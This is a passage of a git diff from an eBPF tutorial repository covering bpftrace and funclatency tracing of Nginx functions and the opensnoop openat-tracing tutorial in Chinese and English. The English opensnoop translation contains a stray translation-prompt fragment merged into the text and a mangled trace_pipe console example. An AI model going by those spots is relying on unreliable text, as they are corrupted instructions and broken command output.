[https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或查看我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 +For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or check out our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). diff --git a/src/39-nginx/README.zh.md b/src/39-nginx/README.zh.md new file mode 100644 index 0000000..1fa4cf2 --- /dev/null +++ b/src/39-nginx/README.zh.md @@ -0,0 +1,149 @@ +# 使用 eBPF 跟踪 Nginx 请求 + +## 引言 + +Nginx 是世界上最流行的 Web 服务器和反向代理之一,以其高性能、稳定性和低资源消耗而闻名。它广泛用于提供静态内容、负载均衡以及作为动态应用的反向代理。为了保持其性能优势,监控和优化 Nginx 的运行尤为重要,尤其是在处理大量请求时。利用 eBPF(扩展的伯克利包过滤器),可以深入了解 Nginx 的性能表现,识别瓶颈并进行优化,而无需修改源代码或重启服务。 + +eBPF 是一项革命性技术,允许开发人员在 Linux 内核中运行自定义程序。最初设计用于网络数据包过滤,但 eBPF 现已发展为一个多功能工具,广泛应用于跟踪、监控和分析系统行为。通过利用 eBPF,您可以跟踪 Nginx 的关键函数,测量延迟,识别瓶颈,进而优化系统性能。 + +## 背景:Nginx 和 eBPF + +### Nginx + +Nginx 采用事件驱动架构,使其在资源占用极少的情况下能够高效处理成千上万的并发连接。这种高效性依赖于其请求处理、响应生成和事件处理等多个性能关键函数。了解这些函数在不同负载下的表现对于优化 Nginx 的使用至关重要。 + +### eBPF + +eBPF 程序在 Linux 内核的安全沙盒环境中运行。这些程序可以附加到各种钩子上,如系统调用、跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。这使得 eBPF 成为一个强大的系统可观测性工具,可以收集详细的性能数据并实时执行策略。 + +eBPF 的一个常见用例是跟踪函数执行时间,以测量延迟。这对于了解 Nginx 中特定函数的执行时间特别有用,有助于诊断性能问题、优化资源使用,并提高 Nginx 部署的整体效率。 + +### Uprobes + +Uprobes 是一种用于跟踪用户空间应用程序函数的探针,它通过附加到特定用户空间函数的入口和出口点,可以捕获精确的时间信息。然而,需要注意的是,在内核模式 eBPF 运行时使用 uprobes 可能会带来一定的性能开销。为此,您可以考虑使用基于 LLVM JIT/AOT 的用户模式 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。这种运行时可以在用户空间中运行 eBPF 程序,与内核模式 eBPF 兼容,并有可能降低开销。 + +## Nginx 的性能关键函数 + +以下是 Nginx 中一些性能关键的函数,可以通过 eBPF 进行监控: + +- **ngx_http_process_request**:负责处理传入的 HTTP 请求。监控此函数有助于跟踪请求处理的开始。 +- **ngx_http_upstream_send_request**:当 Nginx 作为反向代理时,负责向上游服务器发送请求。 +- **ngx_http_finalize_request**:完成 HTTP 请求的处理,包括发送响应。跟踪此函数可以衡量整个请求处理的时间。 +- **ngx_event_process_posted**:处理事件循环中的队列事件。 +- **ngx_handle_read_event**:负责处理来自套接字的读取事件,对监控网络 I/O 性能至关重要。 +- **ngx_writev_chain**:负责将响应发送回客户端,通常与写事件循环结合使用。 + +## 使用 bpftrace 跟踪 Nginx 函数 + +为了监控这些函数,我们可以使用 `bpftrace`,一种 eBPF 的高级跟踪语言。以下是一个用于跟踪几个关键 Nginx 函数执行时间的脚本: + +```bt +#!/usr/sbin/bpftrace + +// 监控 HTTP 请求处理的开始 +uprobe:/usr/sbin/nginx:ngx_http_process_request +{ + printf("HTTP 请求处理开始 (tid: %d)\n", tid); + @start[tid] = nsecs; +} + +// 监控 HTTP 请求的完成 +uretprobe:/usr/sbin/nginx:ngx_http_finalize_request +/@start[tid]/ +{ + $elapsed = nsecs - @start[tid]; + printf("HTTP 请求处理时间: %d ns (tid: %d)\n", $elapsed, tid); + delete(@start[tid]); +} + +// 监控向上游服务器发送请求的开始 +uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request +{ + printf("开始向上游服务器发送请求 (tid: %d)\n", tid); + @upstream_start[tid] = nsecs; +} + +// 监控上游请求发送完成 +uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request +/@upstream_start[tid]/ +{ + $elapsed = nsecs - @upstream_start[tid]; + printf("上游请求发送完成时间: %d ns (tid: %d)\n", $elapsed, tid); + delete(@upstream_start[tid]); +} + +// 监控事件处理的开始 +uprobe:/usr/sbin/nginx:ngx_event_process_posted +{ + printf("事件处理开始 (tid: %d)\n", tid); + @event_start[tid] = nsecs; +} + +// 监控事件处理的完成 +uretprobe:/usr/sbin/nginx:ngx_event_process_posted +/@event_start[tid]/ +{ + $elapsed = nsecs - @event_start[tid]; + printf("事件处理时间: %d ns (tid: %d)\n", $elapsed, tid); + delete(@event_start[tid]); +} +``` + +### 运行脚本 + +要运行上述脚本,先启动 Nginx,然后使用 `curl` 等工具生成 HTTP 请求: + +```bt +# bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt +Attaching 4 probes... +事件处理开始 (tid: 1071) +事件处理时间: 166396 ns (tid: 1071) +事件处理开始 (tid: 1071) +事件处理时间: 87998 ns (tid: 1071) +HTTP 请求处理开始 (tid: 1071) +HTTP 请求处理时间: 1083969 ns (tid: 1071) +事件处理开始 (tid: 1071) +事件处理时间: 92597 ns (tid: 1071) +``` + +该脚本监控了几个 Nginx 函数的开始和结束时间,并打印了每个函数的执行时间。这些数据可以用来分析和优化 Nginx 服务器的性能。 + +## 测试 Nginx 的函数延迟 + +为了更详细地分析函数延迟,您可以使用 `funclatency` 工具,该工具可以测量 Nginx 函数的延迟分布。以下是如何测试 `ngx_http_process_request` 函数的延迟: + +```console +# sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request +tracing /usr/sbin/nginx:ngx_http_process_request... +tracing func ngx_http_process_request in /usr/sbin/nginx... +Tracing /usr/sbin/nginx:ngx_http_process_request. Hit Ctrl-C to exit +^C + nsec : count distribution + 0 -> 1 : 0 | | + 524288 -> 1048575 : 16546 |****************************************| + 1048576 -> 2097151 : 2296 |***** | + 2097152 -> 4194303 : 1264 |*** | + 4194304 -> 8388607 : 293 | | + 8388608 -> 16777215 : 37 | | +Exiting trace of /usr/sbin/nginx:ngx_http_process_request +``` + +### 结果总结 + +上述结果显示了 `ngx_http_process_request` 函数的延迟分布。大多数请求在 524,288 至 1,048,575 纳秒内处理完成,少部分请求处理时间更长。这些信息对于识别性能瓶颈和优化 Nginx 请求处理至关重要。 + +通过使用 `funclatency`,您可以: + +- **识别性能瓶颈**:了解哪些函数执行时间最长,并将优化工作重点放在这些函数上。 +- **监控系统性能**:定期监控函数延迟,确保在高负载下 Nginx 服务器的最佳性能。 +- **优化 Nginx 配置**:利用延迟测量得出的洞察调整 Nginx 设置或修改应用程序,以提高整体性能。 + +您可以在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency) 中找到 `funclatency` 工具。 + +## 结论 + +通过 eBPF 跟踪 Nginx 请求可以为您的 Web 服务器提供宝贵的性能洞察,使您能够监控、分析和优化其操作。使用 `bpftrace` 和 `funclatency` + + 等工具,您可以测量函数执行时间、识别瓶颈,并根据数据做出决策来改进 Nginx 部署。 + +如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或查看我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 diff --git a/src/39-nginx/README_en.md b/src/39-nginx/README_en.md deleted file mode 100644 index 44ff33f..0000000 --- a/src/39-nginx/README_en.md +++ /dev/null @@ -1,145 +0,0 @@ -# Using eBPF to Trace Nginx Requests - -Nginx is one of the most popular web servers and reverse proxies in the world, known for its high performance, stability, and low resource consumption. It is widely used for serving static content, load balancing, and acting as a reverse proxy for dynamic applications. To maintain its performance edge, it's crucial to monitor and optimize Nginx's operations, especially when handling a large number of requests. One powerful way to gain insights into Nginx's performance is by using eBPF (Extended Berkeley Packet Filter). - -eBPF is a revolutionary technology that allows developers to run custom programs in the Linux kernel. Originally designed for network packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior in both kernel and user space. By leveraging eBPF, you can trace Nginx's critical functions, measure latency, and identify bottlenecks without modifying the source code or restarting the service. - -## Background: Nginx and eBPF - -### Nginx - -Nginx operates on an event-driven architecture, making it highly efficient and capable of handling thousands of simultaneous connections with minimal resources. This efficiency is achieved through various performance-critical functions involved in request processing, response generation, and event handling. Understanding how these functions behave under different loads is key to optimizing Nginx for your specific use case. - -### eBPF - -eBPF programs run in a secure, sandboxed environment within the Linux kernel. These programs can attach to various hooks, such as system calls, tracepoints, and even user-space functions via uprobes (user-level probes). This capability allows you to collect detailed performance data and enforce policies in real time, making eBPF an invaluable tool for system observability. - -One common use case of eBPF is tracing function execution to measure latency, which is particularly useful for understanding how long specific Nginx functions take to execute. This information can help in diagnosing performance issues, optimizing resource usage, and improving the overall efficiency of your Nginx deployment. - -### Uprobes - -Uprobes are a type of probe that can be used to trace functions in user-space applications, such as Nginx. They work by attaching to specific user-space function entry and exit points, allowing you to capture precise timing information. However, it’s important to note that using uprobes in the kernel mode eBPF runtime may cause some performance overhead. To mitigate this, you can consider using a user-mode eBPF runtime like [bpftime](https://github.com/eunomia-bpf/bpftime), which is based on LLVM JIT/AOT. This runtime can run eBPF programs in user space, offering compatibility with kernel mode eBPF while potentially reducing overhead. - -## Performance-Critical Functions in Nginx - -Here are some key Nginx functions that are performance-critical and can be monitored using eBPF: - -- **ngx_http_process_request**: Processes incoming HTTP requests. Monitoring this function helps track the start of request handling. -- **ngx_http_upstream_send_request**: Handles sending requests to upstream servers when Nginx is acting as a reverse proxy. -- **ngx_http_finalize_request**: Finalizes HTTP request processing, including sending the response. Tracing this can measure total request handling time. -- **ngx_event_process_posted**: Processes queued events as part of the Nginx event loop. -- **ngx_handle_read_event**: Handles read events from sockets, crucial for monitoring network I/O performance. -- **ngx_writev_chain**: Sends responses back to the client, typically used in conjunction with the write event loop. - -## Using bpftrace to Trace Nginx Functions - -To monitor these functions, we can use `bpftrace`, a high-level tracing language for eBPF. Below is a script that traces the execution time of several critical Nginx functions: - -```bt -#!/usr/sbin/bpftrace - -// Monitor the start of HTTP request processing -uprobe:/usr/sbin/nginx:ngx_http_process_request -{ - printf("HTTP request processing started (tid: %d)\n", tid); - @start[tid] = nsecs; -} - -// Monitor when an HTTP request is finalized -uretprobe:/usr/sbin/nginx:ngx_http_finalize_request -/@start[tid]/ -{ - $elapsed = nsecs - @start[tid]; - printf("HTTP request processed in %d ns (tid: %d)\n", $elapsed, tid); - delete(@start[tid]); -} - -// Monitor the start of sending a request to an upstream server -uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request -{ - printf("Upstream request sending started (tid: %d)\n", tid); - @upstream_start[tid] = nsecs; -} - -// Monitor when the upstream request is sent -uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request -/@upstream_start[tid]/ -{ - $elapsed = nsecs - @upstream_start[tid]; - printf("Upstream request sent in %d ns (tid: %d)\n", $elapsed, tid); - delete(@upstream_start[tid]); -} - -// Monitor the start of event processing -uprobe:/usr/sbin/nginx:ngx_event_process_posted -{ - printf("Event processing started (tid: %d)\n", tid); - @event_start[tid] = nsecs; -} - -// Monitor when event processing is completed -uretprobe:/usr/sbin/nginx:ngx_event_process_posted -/@event_start[tid]/ -{ - $elapsed = nsecs - @event_start[tid]; - printf("Event processed in %d ns (tid: %d)\n", $elapsed, tid); - delete(@event_start[tid]); -} -``` - -### Running the Program - -To run the above script, start Nginx and use a tool like `curl` to generate HTTP requests: - -```bt -# bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt -Attaching 4 probes... -Event processing started (tid: 1071) -Event processed in 166396 ns (tid: 1071) -Event processing started (tid: 1071) -Event processed in 87998 ns (tid: 1071) -HTTP request processing started (tid: 1071) -HTTP request processed in 1083969 ns (tid: 1071) -Event processing started (tid: 1071) -Event processed in 92597 ns (tid: 1071) -``` - -The script monitors the start and end times of various Nginx functions and prints the elapsed time for each. This data can be used to analyze and optimize the performance of your Nginx server. - -## Testing Function Latency in Nginx - -For a more detailed analysis of function latency, you can use the `funclatency` tool, which measures the latency distribution of Nginx functions. Here’s how to test the latency of the `ngx_http_process_request` function: - -```console -# sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request -tracing /usr/sbin/nginx:ngx_http_process_request... -tracing func ngx_http_process_request in /usr/sbin/nginx... -Tracing /usr/sbin/nginx:ngx_http_process_request. Hit Ctrl-C to exit -^C - nsec : count distribution - 0 -> 1 : 0 | | - 524288 -> 1048575 : 16546 |****************************************| - 1048576 -> 2097151 : 2296 |***** | - 2097152 -> 4194303 : 1264 |*** | - 4194304 -> 8388607 : 293 | | - 8388608 -> 16777215 : 37 | | -Exiting trace of /usr/sbin/nginx:ngx_http_process_request -``` - -### Summary of Results - -The results above show the distribution of latency for the `ngx_http_process_request` function. The majority of requests were processed within 524,288 to 1,048,575 nanoseconds, with a smaller percentage taking longer. This information can be crucial in identifying performance bottlenecks and optimizing request handling in Nginx. - -By using `funclatency`, you can: - -- **Identify Performance Bottlenecks**: Understand which functions are taking the most time to execute and focus your optimization efforts there. -- **Monitor System Performance**: Regularly monitor function latency to ensure your Nginx server is performing optimally, especially under heavy load. -- **Optimize Nginx Configuration**: Use the insights gained from latency measurements to tweak Nginx settings or modify your application to improve overall performance. - -You can find the `funclatency` tool in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency). - -## Conclusion - -Tracing Nginx requests with eBPF provides valuable insights into the performance of your web server, allowing you to monitor, analyze, and optimize its operation. By using tools like `bpftrace` and `funclatency`, you can measure function execution times, identify bottlenecks, and make data-driven decisions to improve your Nginx deployment. - -For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or check out our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). diff --git a/src/4-opensnoop/README.md b/src/4-opensnoop/README.md index 616488e..c2648cf 100644 --- a/src/4-opensnoop/README.md +++ b/src/4-opensnoop/README.md @@ -1,16 +1,16 @@ -# eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid +# eBPF Tutorial by Example 4: Capturing Opening Files and Filter with Global Variables -eBPF(Extended Berkeley Packet Filter)是一种内核执行环境,它可以让用户在内核中运行一些安全的、高效的程序。它通常用于网络过滤、性能分析、安全监控等场景。eBPF 之所以强大,是因为它能够在内核运行时捕获和修改数据包或者系统调用,从而实现对操作系统行为的监控和调整。 +eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior. -本文是 eBPF 入门开发实践教程的第四篇,主要介绍如何捕获进程打开文件的系统调用集合,并使用全局变量在 eBPF 中过滤进程 pid。 +This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. -在 Linux 系统中,进程与文件之间的交互是通过系统调用来实现的。系统调用是用户态程序与内核态程序之间的接口,它们允许用户态程序请求内核执行特定操作。在本教程中,我们关注的是 sys_openat 系统调用,它用于打开文件。 +In Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space programs and kernel space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files. -当进程打开一个文件时,它会向内核发出 sys_openat 系统调用,并传递相关参数(例如文件路径、打开模式等)。内核会处理这个请求,并返回一个文件描述符(file descriptor),这个描述符将在后续的文件操作中用作引用。通过捕获 sys_openat 系统调用,我们可以了解进程在什么时候以及如何打开文件。 +When a process opens a file, it issues a sys_openat system call to the kernel and passes relevant parameters (such as file path, open mode, etc.). The kernel handles this request and returns a file descriptor, which serves as a reference for subsequent file operations. By capturing the sys_openat system call, we can understand when and how a process opens a file. -## 在 eBPF 中捕获进程打开文件的系统调用集合 +## Capturing the System Call Collection of Process Opening Files in eBPF -首先,我们需要编写一段 eBPF 程序来捕获进程打开文件的系统调用,具体实现如下: +First, we need to write an eBPF program to capture the system call of a process opening a file. The specific implementation is as follows: ```c #include @@ -27,6 +27,7 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx if (pid_target && pid_target != pid) return false; + // Use bpf_printk to print the process information bpf_printk("Process ID: %d enter sys openat\n", pid); return 0; @@ -36,32 +37,33 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx char LICENSE[] SEC("license") = "GPL"; ``` -这段 eBPF 程序实现了: +This eBPF program implements the following: -1. 引入头文件: 包含了内核数据结构的定义, 包含了 eBPF 程序所需的辅助函数。 -2. 定义全局变量 `pid_target`,用于过滤指定进程 ID。这里设为 0 表示捕获所有进程的 sys_openat 调用。 -3. 使用 `SEC` 宏定义一个 eBPF 程序,关联到 tracepoint "tracepoint/syscalls/sys_enter_openat"。这个 tracepoint 会在进程发起 `sys_openat` 系统调用时触发。 -4. 实现 eBPF 程序 `tracepoint__syscalls__sys_enter_openat`,它接收一个类型为 `struct trace_event_raw_sys_enter` 的参数 `ctx`。这个结构体包含了关于系统调用的信息。 -5. 使用 `bpf_get_current_pid_tgid()` 函数获取当前进程的 PID 和 TID(线程 ID)。由于我们只关心 PID,所以将其值右移 32 位赋值给 `u32` 类型的变量 `pid`。 -6. 检查 `pid_target` 变量是否与当前进程的 pid 相等。如果 `pid_target` 不为 0 且与当前进程的 pid 不相等,则返回 `false`,不对该进程的 `sys_openat` 调用进行捕获。 -7. 使用 `bpf_printk()` 函数打印捕获到的进程 ID 和 `sys_openat` 调用的相关信息。这些信息可以在用户空间通过 BPF 工具查看。 -8. 将程序许可证设置为 "GPL",这是运行 eBPF 程序的必要条件。 +1. Include header files: contains the definition of kernel data structures, and contains the helper functions required by eBPF programs. +2. Define the global variable `pid_target` for filtering a specified process ID. Setting it to 0 captures sys_openat calls from all processes. +3. Use the `SEC` macro to define an eBPF program associated with the tracepoint "tracepoint/syscalls/sys_enter_openat". This tracepoint is triggered when a process initiates the `sys_openat` system call. +4. Implement the eBPF program `tracepoint__syscalls__sys_enter_openat`, which takes a parameter `ctx` of type `struct trace_event_raw_sys_enter`. This structure contains information about the system call. +5. Use the `bpf_get_current_pid_tgid()` function to retrieve the PID and TID (Thread ID) of the current process. Since we only care about the PID, we shift its value 32 bits to the right and assign it to the variable `pid` of Type `u32`. +6. Check if the `pid_target` variable is equal to the current process's PID. If `pid_target` is not 0 and is not equal to the current process's PID, return `false` to skip capturing the `sys_openat` call of that process. +7. Use the `bpf_printk()` function to print the captured process ID and relevant information about the `sys_openat` call. These information can be viewed in user space using BPF tools. +8. Set the program license to "GPL", which is a necessary condition for running eBPF programs.### Instructions +Translate the following Chinese text to English while maintaining the original formatting: -这个 eBPF 程序可以通过 libbpf 或 eunomia-bpf 等工具加载到内核并执行。它将捕获指定进程(或所有进程)的 sys_openat 系统调用,并在用户空间输出相关信息。 +"This eBPF program can be loaded into the kernel and executed using tools like libbpf or eunomia-bpf. It captures the sys_openat system call of the specified process (or all processes) and outputs relevant information in user-space. -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。完整代码请查看 。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. The complete code of this example can be found at . -编译运行上述代码: +Compile and run the above code: ```console $ ecc opensnoop.bpf.c Compiling bpf object... Packing ebpf object and config into package.json... $ sudo ecli run package.json -Runing eBPF program... +Running eBPF program... ``` -运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -69,17 +71,17 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat ``` -此时,我们已经能够捕获进程打开文件的系统调用了。 +At this point, we are able to capture the sys_openat system call for opening files by processes. -## 使用全局变量在 eBPF 中过滤进程 pid +## Filtering Process PID in eBPF using Global Variables -全局变量在 eBPF 程序中充当一种数据共享机制,它们允许用户态程序与 eBPF 程序之间进行数据交互。这在过滤特定条件或修改 eBPF 程序行为时非常有用。这种设计使得用户态程序能够在运行时动态地控制 eBPF 程序的行为。 +Global variables act as a data sharing mechanism in eBPF programs, allowing data interaction between user space programs and eBPF programs. This is very useful when filtering specific conditions or modifying the behavior of eBPF programs. This design allows user space programs to dynamically control the behavior of eBPF programs at runtime. -在我们的例子中,全局变量 `pid_target` 用于过滤进程 PID。用户态程序可以设置此变量的值,以便在 eBPF 程序中只捕获与指定 PID 相关的 `sys_openat` 系统调用。 +In our example, the global variable `pid_target` is used to filter process PIDs. User space programs can set the value of this variable to capture only the `sys_openat` system calls related to the specified PID in the eBPF program. -使用全局变量的原理是,全局变量在 eBPF 程序的数据段(data section)中定义并存储。当 eBPF 程序加载到内核并执行时,这些全局变量会保持在内核中,可以通过 BPF 系统调用进行访问。用户态程序可以使用 BPF 系统调用中的某些特性,如 `bpf_obj_get_info_by_fd` 和 `bpf_obj_get_info`,获取 eBPF 对象的信息,包括全局变量的位置和值。 +The principle of using global variables is that they are defined and stored in the data section of eBPF programs. When the eBPF program is loaded into the kernel and executed, these global variables are retained in the kernel and can be accessed through BPF system calls. User space programs can use certain features of BPF system calls, such as `bpf_obj_get_info_by_fd` and `bpf_obj_get_info`, to obtain information about the eBPF object, including the position and value of global variables. -可以通过执行 ecli -h 命令来查看 opensnoop 的帮助信息: +You can view the help information for opensnoop by executing the command `ecli -h`: ```console $ ecli package.json -h @@ -97,27 +99,24 @@ Built with eunomia-bpf framework. See https://github.com/eunomia-bpf/eunomia-bpf for more information. ``` -可以通过 `--pid_target` 选项来指定要捕获的进程的 pid,例如: +You can specify the PID of the process to capture by using the `--pid_target` option, for example: ```console -$ sudo ./ecli run package.json --pid_target 618 -Runing eBPF program... +$ sudo ./ecli run package.json --pid_target 618 +Running eBPF program... ``` -运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: +After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file: ```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat - <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat +$ sudo cat /sys/kernel/debug/tracing/trace_pipe".\-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat +\-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat ``` -## 总结 +## Summary -本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 `tracepoint__syscalls__sys_enter_open` 和 `tracepoint__syscalls__sys_enter_openat` 函数并使用 `SEC` 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 `bpf_get_current_pid_tgid` 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 `bpf_printk` 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 `pid_target` 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。 +This article introduces how to use eBPF programs to capture the system calls for process file opening. In an eBPF program, we can capture the system calls for process file opening by defining functions `tracepoint__syscalls__sys_enter_open` and `tracepoint__syscalls__sys_enter_openat` and attaching them to the tracepoints `sys_enter_open` and `sys_enter_openat` using the `SEC` macro. We can use the `bpf_get_current_pid_tgid` function to get the process ID that calls the open or openat system call, and print it out in the kernel log using the `bpf_printk` function. In an eBPF program, we can also filter the output by defining a global variable `pid_target` to specify the pid of the process to be captured, only outputting the information of the specified process. -通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。 +By learning this tutorial, you should have a deeper understanding of how to capture and filter system calls for specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing. -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and a complete tutorial. diff --git a/src/4-opensnoop/README.zh.md b/src/4-opensnoop/README.zh.md new file mode 100644 index 0000000..616488e --- /dev/null +++ b/src/4-opensnoop/README.zh.md @@ -0,0 +1,123 @@ +# eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid + +eBPF(Extended Berkeley Packet Filter)是一种内核执行环境,它可以让用户在内核中运行一些安全的、高效的程序。它通常用于网络过滤、性能分析、安全监控等场景。eBPF 之所以强大,是因为它能够在内核运行时捕获和修改数据包或者系统调用,从而实现对操作系统行为的监控和调整。 + +本文是 eBPF 入门开发实践教程的第四篇,主要介绍如何捕获进程打开文件的系统调用集合,并使用全局变量在 eBPF 中过滤进程 pid。 + +在 Linux 系统中,进程与文件之间的交互是通过系统调用来实现的。系统调用是用户态程序与内核态程序之间的接口,它们允许用户态程序请求内核执行特定操作。在本教程中,我们关注的是 sys_openat 系统调用,它用于打开文件。 + +当进程打开一个文件时,它会向内核发出 sys_openat 系统调用,并传递相关参数(例如文件路径、打开模式等)。内核会处理这个请求,并返回一个文件描述符(file descriptor),这个描述符将在后续的文件操作中用作引用。通过捕获 sys_openat 系统调用,我们可以了解进程在什么时候以及如何打开文件。 + +## 在 eBPF 中捕获进程打开文件的系统调用集合 + +首先,我们需要编写一段 eBPF 程序来捕获进程打开文件的系统调用,具体实现如下: + +```c +#include +#include + +/// @description "Process ID to trace" +const volatile int pid_target = 0; + +SEC("tracepoint/syscalls/sys_enter_openat") +int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx) +{ + u64 id = bpf_get_current_pid_tgid(); + u32 pid = id >> 32; + + if (pid_target && pid_target != pid) + return false; + // Use bpf_printk to print the process information + bpf_printk("Process ID: %d enter sys openat\n", pid); + return 0; +} + +/// "Trace open family syscalls." +char LICENSE[] SEC("license") = "GPL"; +``` + +这段 eBPF 程序实现了: + +1. 引入头文件: 包含了内核数据结构的定义, 包含了 eBPF 程序所需的辅助函数。 +2. 定义全局变量 `pid_target`,用于过滤指定进程 ID。这里设为 0 表示捕获所有进程的 sys_openat 调用。 +3. 使用 `SEC` 宏定义一个 eBPF 程序,关联到 tracepoint "tracepoint/syscalls/sys_enter_openat"。这个 tracepoint 会在进程发起 `sys_openat` 系统调用时触发。 +4. 实现 eBPF 程序 `tracepoint__syscalls__sys_enter_openat`,它接收一个类型为 `struct trace_event_raw_sys_enter` 的参数 `ctx`。这个结构体包含了关于系统调用的信息。 +5. 使用 `bpf_get_current_pid_tgid()` 函数获取当前进程的 PID 和 TID(线程 ID)。由于我们只关心 PID,所以将其值右移 32 位赋值给 `u32` 类型的变量 `pid`。 +6. 检查 `pid_target` 变量是否与当前进程的 pid 相等。如果 `pid_target` 不为 0 且与当前进程的 pid 不相等,则返回 `false`,不对该进程的 `sys_openat` 调用进行捕获。 +7. 使用 `bpf_printk()` 函数打印捕获到的进程 ID 和 `sys_openat` 调用的相关信息。这些信息可以在用户空间通过 BPF 工具查看。 +8. 将程序许可证设置为 "GPL",这是运行 eBPF 程序的必要条件。 + +这个 eBPF 程序可以通过 libbpf 或 eunomia-bpf 等工具加载到内核并执行。它将捕获指定进程(或所有进程)的 sys_openat 系统调用,并在用户空间输出相关信息。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。完整代码请查看 。 + +编译运行上述代码: + +```console +$ ecc opensnoop.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat + <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat +``` + +此时,我们已经能够捕获进程打开文件的系统调用了。 + +## 使用全局变量在 eBPF 中过滤进程 pid + +全局变量在 eBPF 程序中充当一种数据共享机制,它们允许用户态程序与 eBPF 程序之间进行数据交互。这在过滤特定条件或修改 eBPF 程序行为时非常有用。这种设计使得用户态程序能够在运行时动态地控制 eBPF 程序的行为。 + +在我们的例子中,全局变量 `pid_target` 用于过滤进程 